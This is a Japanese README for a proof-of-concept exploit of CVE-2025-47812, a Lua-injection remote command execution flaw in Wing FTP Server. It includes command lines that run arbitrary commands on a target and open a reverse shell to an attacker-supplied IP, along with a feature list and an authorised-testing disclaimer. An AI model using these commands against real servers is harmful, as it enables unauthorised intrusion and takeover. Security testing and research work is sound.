
Wing FTP Server (CVE-2025-47812) のリモートコマンド実行エクスプロイト
このリポジトリは CVE-2025-47812 の概念実証エクスプロイトを提供します。これは Wing FTP Server のリモートコマンド実行 (RCE) 脆弱性です。攻撃者は認証時に username パラメータを悪用して任意の Lua ベースのシステムコマンドを注入・実行し、完全なリモートコード実行を引き起こすことができます。
found_uids.txt に記録簡単なシェルコマンドを実行:
python3 CVE-2025-47812.py --url http://target:5466 --cmd "id"
リバースシェルを起動:
python3 CVE-2025-47812.py --url http://target:5466 --reverse --ip YOUR_IP --port 4444
ドライランモード (リクエストは送信されません):
python3 CVE-2025-47812.py --url http://target:5466 --cmd "whoami" --dry-run
| 機能/改善点 | 説明 |
|---|---|
| ✅ 引数解析 | 非対話モード用の argparse CLI サポートを追加 |
| 🔐 入力検証 | エクスプロイト実行前に URL/IP/ポートが有効であることを確認 |
| 📦 ヘッダーリファクタリング | HTTP ヘッダーを再利用可能な関数に抽出し一貫性を向上 |
| 📄 UID ログ記録 | 成功した UID トークンを found_uids.txt に保存 |
| 🧪 ドライランモード | リクエストを送信せず安全にテスト可能 (--dry-run) |
| 🕒 タイムアウト + リトライ | リクエストのタイムアウト設定と失敗時の自動リトライを追加 |
| 🧼 ペイロードの可読性 | Lua インジェクション文字列を整形し、明確さと保守性を向上 |
| 📊 構造化出力 | サーバー応答とペイロード情報を区切り線で囲み読みやすくした |
| ⚠️ ステータスコードチェック | ターゲットが予期しない HTTP ステータスコードを返した場合に警告 |
| 📝 ログシステム | print() の代わりに Python logging モジュールを使用し、詳細度制御を改善 |
このプロジェクトは教育目的および許可されたセキュリティテスト専用です。
所有していない、または明示的なテスト許可がないシステムに対してこのツールを使用しないでください。